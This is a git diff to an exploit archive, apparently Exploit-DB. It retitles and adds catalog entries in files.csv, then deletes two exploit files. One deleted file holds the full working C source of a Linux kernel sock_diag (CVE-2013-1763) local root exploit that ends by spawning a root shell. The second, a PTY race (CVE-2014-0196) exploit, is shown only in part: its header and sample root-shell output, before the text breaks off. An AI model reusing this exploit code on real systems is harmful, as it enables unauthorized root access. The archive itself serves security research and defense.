diff --git a/files.csv b/files.csv
index e90226f48..505d8768a 100755
--- a/files.csv
+++ b/files.csv
@@ -1737,7 +1737,7 @@ id,file,description,date,author,platform,type,port
 2028,platforms/php/webapps/2028.txt,"Sitemap Mambo Component <= 2.0.0 - Remote Include Vulnerability",2006-07-17,Matdhule,php,webapps,0
 2029,platforms/php/webapps/2029.txt,"pollxt Mambo Component <= 1.22.07 - Remote Include Vulnerability",2006-07-17,vitux,php,webapps,0
 2030,platforms/php/webapps/2030.txt,"MiniBB Mambo Component <= 1.5a Remote File Include Vulnerabilities",2006-07-17,Matdhule,php,webapps,0
-2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - prctl() Local Root Exploit (logrotate)",2006-07-18,"Marco Ivaldi",linux,local,0
+2031,platforms/linux/local/2031.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - logrotate prctl() Local Root Exploit",2006-07-18,"Marco Ivaldi",linux,local,0
 2032,platforms/php/webapps/2032.pl,"Eskolar CMS 0.9.0.0 - Remote Blind SQL Injection Exploit",2006-07-18,"Jacek Wlodarczyk",php,webapps,0
 2033,platforms/php/webapps/2033.pl,"Invision Power Board 2.1 <= 2.1.6 - Remote SQL Injection Exploit (2)",2006-07-18,"w4g.not null",php,webapps,0
 2034,platforms/hardware/remote/2034.txt,"BT Voyager 2091 (Wireless ADSL) - Multiple Vulnerabilities",2006-07-18,"Adrian ""pagvac"" Pastor",hardware,remote,0
@@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling Vulnerability",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection Vulnerability",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV Local Privilege Escalation Exploit",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 (profile) Shell Upload Vulnerability",2009-04-20,JosS,php,webapps,0
@@ -8943,7 +8943,7 @@ id,file,description,date,author,platform,type,port
 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup Vulnerability",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
-9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android Edition)",2009-08-18,Zinx,android,local,0
+9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - sock_sendpage() ring0 Root Exploit (1)",2009-08-24,"INetCop Security",linux,local,0
 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
@@ -13833,7 +13833,7 @@ id,file,description,date,author,platform,type,port
 15958,platforms/php/webapps/15958.txt,"Joomla Captcha Plugin <= 4.5.1 - Local File Disclosure Vulnerability",2011-01-09,dun,php,webapps,0
 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 MXE File Syntactic Analysis Buffer Overflow PoC",2011-01-10,LiquidWorm,windows,dos,0
 15960,platforms/php/webapps/15960.txt,"Maximus CMS 1.1.2 - (fckeditor) Arbitrary File Upload Vulnerability",2011-01-10,eidelweiss,php,webapps,0
-15962,platforms/solaris/local/15962.c,"Linux Kernel Solaris < 5.10 138888-01 - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
+15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Root Exploit",2011-01-10,peri.carding,solaris,local,0
 15963,platforms/windows/remote/15963.rb,"Windows Common Control Library (Comctl32) - Heap Overflow (MS10-081)",2011-01-10,"Nephi Johnson",windows,remote,0
 15964,platforms/php/webapps/15964.py,"Lotus CMS Fraise 3.0 - LFI - Remote Code Execution Exploit",2011-01-10,mr_me,php,webapps,0
 15968,platforms/php/webapps/15968.txt,"vam shop 1.6 - Multiple Vulnerabilities",2011-01-11,"High-Tech Bridge SA",php,webapps,0
@@ -15119,7 +15119,7 @@ id,file,description,date,author,platform,type,port
 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0
 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection Vulnerability",2011-06-11,BlueH4G,php,webapps,0
 17390,platforms/php/webapps/17390.txt,"SUBRION CMS - Multiple Vulnerabilities",2011-06-11,"Karthik R",php,webapps,0
-17391,platforms/linux/local/17391.c,"DEC Alpha Linux <= 3.0 - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
+17391,platforms/linux/local/17391.c,"Linux Kernel <= 2.6.28 / <= 3.0 (DEC Alpha Linux) - Local Root Exploit",2011-06-11,"Dan Rosenberg",linux,local,0
 17392,platforms/windows/remote/17392.rb,"IBM Tivoli Endpoint Manager POST Query Buffer Overflow",2011-06-12,metasploit,windows,remote,0
 17393,platforms/multiple/webapps/17393.txt,"Oracle HTTP Server - XSS Header Injection",2011-06-13,"Yasser ABOUKIR",multiple,webapps,0
 17394,platforms/php/webapps/17394.txt,"Scriptegrator plugin for Joomla! 1.5 - File Inclusion Vulnerability (0day)",2011-06-13,jdc,php,webapps,0
@@ -18032,8 +18032,8 @@ id,file,description,date,author,platform,type,port
 20717,platforms/windows/remote/20717.txt,"elron im anti-virus 3.0.3 - Directory Traversal Vulnerability",2001-03-23,"Erik Tayler",windows,remote,0
 20718,platforms/unix/local/20718.txt,"MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability",2001-03-18,lesha,unix,local,0
 20719,platforms/multiple/remote/20719.txt,"Tomcat 3.2.1/4.0_Weblogic Server 5.1 URL JSP Request Source Code Disclosure Vulnerability",2001-03-28,"Sverre H. Huseby",multiple,remote,0
-20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
-20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0 and RH 6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
+20720,platforms/linux/local/20720.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 / 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (1)",2001-03-27,"Wojciech Purczynski",linux,local,0
+20721,platforms/linux/local/20721.c,"Linux Kernel <= 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root Vulnerability (2)",2001-03-27,"Wojciech Purczynski",linux,local,0
 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure Vulnerability",2001-04-03,lovehacker,multiple,remote,0
 20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure Vulnerability",2001-04-03,"Rob Beck",windows,remote,0
 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure Vulnerability",2001-03-30,"Dixie Flatline",hp-ux,local,0
@@ -21720,7 +21720,7 @@ id,file,description,date,author,platform,type,port
 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0
 24551,platforms/php/webapps/24551.txt,"Joomla! <= 3.0.2 (highlight.php) PHP Object Injection Vulnerability",2013-02-27,EgiX,php,webapps,0
 24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0
-24555,platforms/linux/local/24555.c,"Archlinux x86-64 3.3.x - 3.7.x x86-64 - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
+24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x - 3.7.x (Arch Linux x86-64) - sock_diag_handlers[] Local Root",2013-02-27,sd,linux,local,0
 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - (.m3u) Buffer Overflow Vulnerability",2013-03-01,metacom,windows,dos,0
 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
 24560,platforms/php/webapps/24560.txt,"doorGets CMS - CSRF Vulnerability",2013-03-01,n0pe,php,webapps,0
@@ -22120,7 +22120,7 @@ id,file,description,date,author,platform,type,port
 24967,platforms/multiple/webapps/24967.txt,"nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",multiple,webapps,0
 25090,platforms/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass Vulnerability",2005-02-08,"Albania Security Clan",php,webapps,0
 25091,platforms/multiple/remote/25091.txt,"realnetworks realarcade 1.2.0.994 - Multiple Vulnerabilities",2005-02-08,"Luigi Auriemma",multiple,remote,0
-25816,platforms/php/webapps/25816.txt,"Ovidentia FX Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0
+25816,platforms/php/webapps/25816.txt,"Ovidentia FX - Remote File Include Vulnerability",2005-06-10,Status-x,php,webapps,0
 25817,platforms/cgi/webapps/25817.txt,"JamMail 1.8 Jammail.pl Remote Arbitrary Command Execution Vulnerability",2005-06-12,blahplok,cgi,webapps,0
 25818,platforms/php/webapps/25818.txt,"Singapore 0.9.11 beta Image Gallery Index.PHP Cross-Site Scripting Vulnerability",2005-06-13,TheGreatOne2176,php,webapps,0
 24972,platforms/windows/dos/24972.c,"Flightgear 2.0/2.4 - Remote Format String Exploit",2013-04-22,Kurono,windows,dos,0
@@ -22350,7 +22350,7 @@ id,file,description,date,author,platform,type,port
 25200,platforms/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Remote Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,php,webapps,0
 25201,platforms/cgi/webapps/25201.txt,"NewsScript Access Validation Vulnerability",2005-03-08,adrianc23@gmail.com,cgi,webapps,0
 25202,platforms/linux/local/25202.c,"Linux Kernel 2.6.x - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (1)",2005-03-09,sd,linux,local,0
-25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x / <= 2.6.9 / <= 2.6.11 (RHEL4) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2)",2005-03-09,alert7,linux,local,0
+25203,platforms/linux/local/25203.c,"Linux Kernel 2.6.x (RHEL4  <= 2.6.9 / <= 2.6.11) - SYS_EPoll_Wait Local Integer Overflow Local Root Vulnerability (2)",2005-03-09,alert7,linux,local,0
 25204,platforms/windows/local/25204.py,"ABBS Audio Media Player 3.1 - (.lst) Buffer Overflow",2013-05-04,"Julien Ahrens",windows,local,0
 25205,platforms/multiple/remote/25205.txt,"Techland XPand Rally 1.0/1.1 - Remote Format String Vulnerability",2005-03-10,"Luigi Auriemma",multiple,remote,0
 25206,platforms/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,php,webapps,0
@@ -24429,7 +24429,7 @@ id,file,description,date,author,platform,type,port
 27294,platforms/php/remote/27294.rb,"PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution",2013-08-02,metasploit,php,remote,7443
 27295,platforms/unix/remote/27295.rb,"PineApp Mail-SeCure livelog.html Arbitrary Command Execution",2013-08-02,metasploit,unix,remote,7443
 27296,platforms/windows/local/27296.rb,"MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation",2013-08-02,metasploit,windows,local,0
-27297,platforms/lin_amd64/local/27297.c,"Linux Kernel (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
+27297,platforms/lin_amd64/local/27297.c,"Linux Kernel <= 3.7.6  (Redhat) (32bit/64bit) - 'MSR' Driver Local Privilege Escalation",2013-08-02,spender,lin_amd64,local,0
 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability",2006-02-23,ReZEN,php,webapps,0
 27299,platforms/php/webapps/27299.txt,"NOCC 1.0 error.php html_error_occurred Parameter XSS",2006-02-23,rgod,php,webapps,0
 27300,platforms/php/webapps/27300.txt,"NOCC 1.0 filter_prefs.php html_filter_select Parameter XSS",2006-02-23,rgod,php,webapps,0
@@ -25058,14 +25058,14 @@ id,file,description,date,author,platform,type,port
 27946,platforms/php/webapps/27946.txt,"Portix-PHP 2-0.3.2 Portal Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,SpC-x,php,webapps,0
 27947,platforms/php/webapps/27947.txt,"TAL RateMyPic 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
 27948,platforms/php/webapps/27948.txt,"Squirrelmail 1.4.x Redirect.PHP Local File Include Vulnerability",2006-06-02,brokejunker,php,webapps,0
-27949,platforms/php/webapps/27949.txt,"ovidentia 5.6.x/5.8 approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27950,platforms/php/webapps/27950.txt,"ovidentia 5.6.x/5.8 vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27951,platforms/php/webapps/27951.txt,"ovidentia 5.6.x/5.8 vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27952,platforms/php/webapps/27952.txt,"ovidentia 5.6.x/5.8 vacadm.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27953,platforms/php/webapps/27953.txt,"ovidentia 5.6.x/5.8 statart.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27954,platforms/php/webapps/27954.txt,"ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27955,platforms/php/webapps/27955.txt,"ovidentia 5.6.x/5.8 posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
-27956,platforms/php/webapps/27956.txt,"ovidentia 5.6.x/5.8 options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27949,platforms/php/webapps/27949.txt,"Ovidentia 5.6.x/5.8 - approb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27950,platforms/php/webapps/27950.txt,"Ovidentia 5.6.x/5.8 - vacadmb.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27951,platforms/php/webapps/27951.txt,"Ovidentia 5.6.x/5.8 - vacadma.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27952,platforms/php/webapps/27952.txt,"Ovidentia 5.6.x/5.8 - vacadm.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27953,platforms/php/webapps/27953.txt,"Ovidentia 5.6.x/5.8 - statart.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27954,platforms/php/webapps/27954.txt,"Ovidentia 5.6.x/5.8 - search.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27955,platforms/php/webapps/27955.txt,"Ovidentia 5.6.x/5.8 - posts.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
+27956,platforms/php/webapps/27956.txt,"Ovidentia 5.6.x/5.8 - options.php babInstallPath Parameter Remote File Inclusion",2006-06-02,black-cod3,php,webapps,0
 27957,platforms/php/webapps/27957.txt,"MyBloggie 2.1.x - Multiple Remote File Include Vulnerabilities",2006-06-02,ERNE,php,webapps,0
 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0
 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0
@@ -30222,7 +30222,7 @@ id,file,description,date,author,platform,type,port
 33511,platforms/multiple/webapps/33511.txt,"Zenoss 2.3.3 - Multiple SQL Injection Vulnerabilities",2010-01-14,"nGenuity Information Services",multiple,webapps,0
 33514,platforms/php/webapps/33514.txt,"Videos Tube 1.0 - Multiple SQL Injection Vulnerabilities",2014-05-26,"Mustafa ALTINKAYNAK",php,webapps,80
 33646,platforms/php/webapps/33646.txt,"Joomla MS Comment Component 0.8.0b Security Bypass and Cross-Site Scripting Vulnerabilities",2009-12-31,"Jeff Channell",php,webapps,0
-33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition (x64) Local Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
+33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 - Raw Mode PTY Local Echo Race Condition Local Privilege Escalation (x64)",2014-05-26,"Matthew Daley",linux,local,0
 33518,platforms/hardware/webapps/33518.txt,"Zyxel P-660HW-T1 3 Wireless Router - CSRF Vulnerability",2014-05-26,"Mustafa ALTINKAYNAK",hardware,webapps,80
 33635,platforms/linux/dos/33635.c,"Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' NULL Pointer Dereference Denial of Service Vulnerability",2008-07-31,"Rémi Denis-Courmont",linux,dos,0
 33520,platforms/hardware/webapps/33520.txt,"D-Link Routers - Multiple Vulnerabilities",2014-05-26,"Kyle Lovett",hardware,webapps,80
@@ -35484,7 +35484,7 @@ id,file,description,date,author,platform,type,port
 39223,platforms/php/webapps/39223.txt,"ZeusCart 'prodid' Parameter SQL Injection Vulnerability",2014-06-24,"Kenny Mathis",php,webapps,0
 39224,platforms/hardware/remote/39224.py,"FortiGate OS Version 4.x - 5.0.7 - SSH Backdoor",2016-01-12,operator8203,hardware,remote,22
 39229,platforms/linux/dos/39229.cpp,"Grassroots DICOM (GDCM) 2.6.0 and 2.6.1 - ImageRegionReader::ReadIntoBuffer Buffer Overflow",2016-01-12,"Stelios Tsampas",linux,dos,0
-39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 overlayfs - Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
+39230,platforms/linux/local/39230.c,"Linux Kernel <= 4.3.3 - overlayfs Local Privilege Escalation",2016-01-12,halfdog,linux,local,0
 39231,platforms/asp/webapps/39231.py,"WhatsUp Gold 16.3 - Unauthenticated Remote Code Execution",2016-01-13,"Matt Buzanowski",asp,webapps,0
 39232,platforms/windows/dos/39232.txt,"Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007)",2016-01-13,"Google Security Research",windows,dos,0
 39233,platforms/windows/dos/39233.txt,"Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007)",2016-01-13,"Google Security Research",windows,dos,0
@@ -35790,8 +35790,8 @@ id,file,description,date,author,platform,type,port
 39552,platforms/php/webapps/39552.txt,"WordPress Beauty & Clean Theme 1.0.8 - Arbitrary File Upload Vulnerability",2016-03-11,"Colette Chamberland",php,webapps,80
 39553,platforms/php/webapps/39553.txt,"WordPress DZS Videogallery Plugin <=8.60 - Multiple Vulnerabilities",2016-03-11,"Colette Chamberland",php,webapps,80
 39554,platforms/php/remote/39554.rb,"PHP Utility Belt Remote Code Execution",2016-03-11,metasploit,php,remote,80
-39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
-39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1. CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
+39555,platforms/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - snd-usb-audio Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
+39556,platforms/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - iowarrior driver Crash PoC",2016-03-14,"OpenSource Security",linux,dos,0
 39557,platforms/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - SEH Overflow DoS",2016-03-14,INSECT.B,windows,dos,0
 39558,platforms/php/webapps/39558.txt,"WordPress Site Import Plugin 1.0.1 - Local and Remote File Inclusion",2016-03-14,Wadeek,php,webapps,80
 39559,platforms/php/webapps/39559.txt,"TeamPass 2.1.24 - Multiple Vulnerabilities",2016-03-14,"Vincent Malguy",php,webapps,80
@@ -36013,3 +36013,6 @@ id,file,description,date,author,platform,type,port
 39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field SEH Overwrite PoC",2016-05-11,"Nipun Jaswal",windows,dos,0
 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 - 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
+39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
+39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
+39809,platforms/windows/local/39809..cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
diff --git a/platforms/linux/local/33336.txt b/platforms/linux/local/33336.txt
deleted file mode 100755
index 8a6d85c37..000000000
--- a/platforms/linux/local/33336.txt
+++ /dev/null
@@ -1,164 +0,0 @@
-/* 
-* quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8
-* bug found by Spender
-* poc by SynQ
-* 
-* hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux
-* using nl_table->hash.rehash_time, index 81
-* 
-* Fedora 18 support added
-* 
-* 2/2013
-*/
-
-#include <unistd.h>
-#include <sys/socket.h>
-#include <linux/netlink.h>
-#include <netinet/tcp.h>
-#include <errno.h>
-#include <linux/if.h>
-#include <linux/filter.h>
-#include <string.h>
-#include <stdio.h>
-#include <stdlib.h>
-#include <linux/sock_diag.h>
-#include <linux/inet_diag.h>
-#include <linux/unix_diag.h>
-#include <sys/mman.h>
-
-typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
-typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
-_commit_creds commit_creds;
-_prepare_kernel_cred prepare_kernel_cred;
-unsigned long sock_diag_handlers, nl_table;
-
-int __attribute__((regparm(3)))
-kernel_code()
-{
-	commit_creds(prepare_kernel_cred(0));
-	return -1;
-}
-
-int jump_payload_not_used(void *skb, void *nlh)
-{
-	asm volatile (
-		"mov $kernel_code, %eax\n"
-		"call *%eax\n"
-	);
-}
-
-unsigned long
-get_symbol(char *name)
-{
-	FILE *f;
-	unsigned long addr;
-	char dummy, sym[512];
-	int ret = 0;
- 
-	f = fopen("/proc/kallsyms", "r");
-	if (!f) {
-		return 0;
-	}
- 
-	while (ret != EOF) {
-		ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
-		if (ret == 0) {
-			fscanf(f, "%s\n", sym);
-			continue;
-		}
-		if (!strcmp(name, sym)) {
-			printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
-			fclose(f);
-			return addr;
-		}
-	}
-	fclose(f);
- 
-	return 0;
-}
-
-int main(int argc, char*argv[])
-{
-	int fd;
-	unsigned family;
-	struct {
-		struct nlmsghdr nlh;
-		struct unix_diag_req r;
-	} req;
-	char	buf[8192];
-
-	if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){
-		printf("Can't create sock diag socket\n");
-		return -1;
-	}
-
-	memset(&req, 0, sizeof(req));
-	req.nlh.nlmsg_len = sizeof(req);
-	req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY;
-	req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
-	req.nlh.nlmsg_seq = 123456;
-
-	//req.r.sdiag_family = 89;
-	req.r.udiag_states = -1;
-	req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN;
-
-	if(argc==1){
-		printf("Run: %s Fedora|Ubuntu\n",argv[0]);
-		return 0;
-	}
-	else if(strcmp(argv[1],"Fedora")==0){
-	  commit_creds = (_commit_creds) get_symbol("commit_creds");
-	  prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
-	  sock_diag_handlers = get_symbol("sock_diag_handlers");
-	  nl_table = get_symbol("nl_table");
-	  
-	  if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){
-		printf("some symbols are not available!\n");
-		exit(1);
-		}
-
-	  family = (nl_table - sock_diag_handlers) / 4;
-	  printf("family=%d\n",family);
-	  req.r.sdiag_family = family;
-	  
-	  if(family>255){
-		printf("nl_table is too far!\n");
-		exit(1);
-		}
-	}
-	else if(strcmp(argv[1],"Ubuntu")==0){
-	  commit_creds = (_commit_creds) 0xc106bc60;
-	  prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0;
-	  req.r.sdiag_family = 81;
-	}
-
-	unsigned long mmap_start, mmap_size;
-	mmap_start = 0x10000;
-	mmap_size = 0x120000;
-	printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size);
-
-        if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC,
-                MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) {
-                printf("mmap fault\n");
-                exit(1);
-        }
-	memset((void*)mmap_start, 0x90, mmap_size);
-
-	char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm
-	unsigned long *asd = &jump[4];
-	*asd = (unsigned long)kernel_code;
-
-	memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump));
-
-	if ( send(fd, &req, sizeof(req), 0) < 0) {
-		printf("bad send\n");
-		close(fd);
-		return -1;
-	}
-
-	printf("uid=%d, euid=%d\n",getuid(), geteuid() );
-
-	if(!getuid())
-		system("/bin/sh");
-
-}
\ No newline at end of file
diff --git a/platforms/linux/local/33516.txt b/platforms/linux/local/33516.txt
deleted file mode 100755
index a25c76594..000000000
--- a/platforms/linux/local/33516.txt
+++ /dev/null
@@ -1,220 +0,0 @@
-/*
- * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
- * condition
- *
- * Slightly-less-than-POC privilege escalation exploit
- * For kernels >= v3.14-rc1
- *
- * Matthew Daley <mattd@bugfuzz.com>
- *
- * Usage: 
- *   $ gcc cve-2014-0196-md.c -lutil -lpthread
- *   $ ./a.out
- *   [+] Resolving symbols
- *   [+] Resolved commit_creds: 0xffffffff81056694
- *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
- *   [+] Doing once-off allocations
- *   [+] Attempting to overflow into a tty_struct...............
- *   [+] Got it :)
- *   # id
- *   uid=0(root) gid=0(root) groups=0(root)
- *
- * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
- * chance that the overflow will go off the end of a slab. This does not
- * necessarily lead to an immediate kernel crash, but you should be prepared
- * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
- * avoidable by reading /proc/slabinfo on systems where it is still available
- * to unprivileged users.
- *
- * Caveat: The vulnerability should be exploitable all the way from
- * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
- * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
